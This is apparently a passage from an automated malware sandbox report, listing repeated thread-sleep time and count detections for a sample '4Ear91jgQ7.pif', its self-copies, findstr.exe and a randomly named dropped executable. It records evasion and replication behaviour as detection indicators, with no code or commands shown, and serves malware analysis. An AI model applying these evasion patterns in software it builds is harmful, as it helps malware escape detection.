            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598605s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598500s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598375s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598096s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597972s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597730s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597621s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597516s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597160s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -597026s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596862s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596495s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596141s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595790s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595665s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595563s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595438s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595313s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -13835058055282155s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 6000Thread sleep count: 3167 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599871s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 6000Thread sleep count: 1556 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599749s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599639s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599530s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599421s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599300s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599172s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -599056s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598953s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598843s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598732s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598474s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598215s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -598016s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597793s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597671s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597559s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597344s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597229s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -597124s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -596953s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -596812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -596672s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -596500s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -596281s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595969s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595609s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595406s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -595042s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -594922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -594765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -594640s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -594496s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep count: 5544 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep time: -11088000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep count: 4428 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep time: -8856000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4852Thread sleep count: 471 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599156s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599006s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598562s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598390s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597484s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596465s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596323s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595854s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595703s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595047s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594887s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594758s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594625s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594495s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594347s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594215s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594070s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593936s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593457s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593296s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593156s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593029s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592890s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592750s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592573s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592315s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592150s >= -30000s
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe TID: 6512Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 2668Thread sleep count: 3855 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 2668Thread sleep count: 4319 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599667s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599541s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599217s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599109s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598978s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598850s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598618s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598515s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598393s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598265s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598140s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597966s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597845s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597590s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597468s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597336s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597229s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597106s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596888s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596671s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596562s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596343s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596124s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596015s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595434s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595214s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595109s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594886s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594780s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594546s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594314s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 6824Thread sleep count: 2662 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599629s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599503s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 6824Thread sleep count: 4681 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599251s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599117s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598996s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598886s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598751s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598390s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598091s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597937s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597802s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597518s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597382s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597271s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597124s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596591s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596481s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596363s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596223s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596094s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595862s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595736s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595609s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595492s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595379s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595250s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595139s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595028s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594900s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594783s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594544s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594431s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594307s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594045s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593107s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 1708Thread sleep count: 1876 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599610s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599360s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599172s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598782s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598372s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598125s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597735s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597472s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597203s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 1708Thread sleep count: 1401 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597094s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596962s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596835s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596723s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596594s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596469s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596357s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596108s >= -30000s
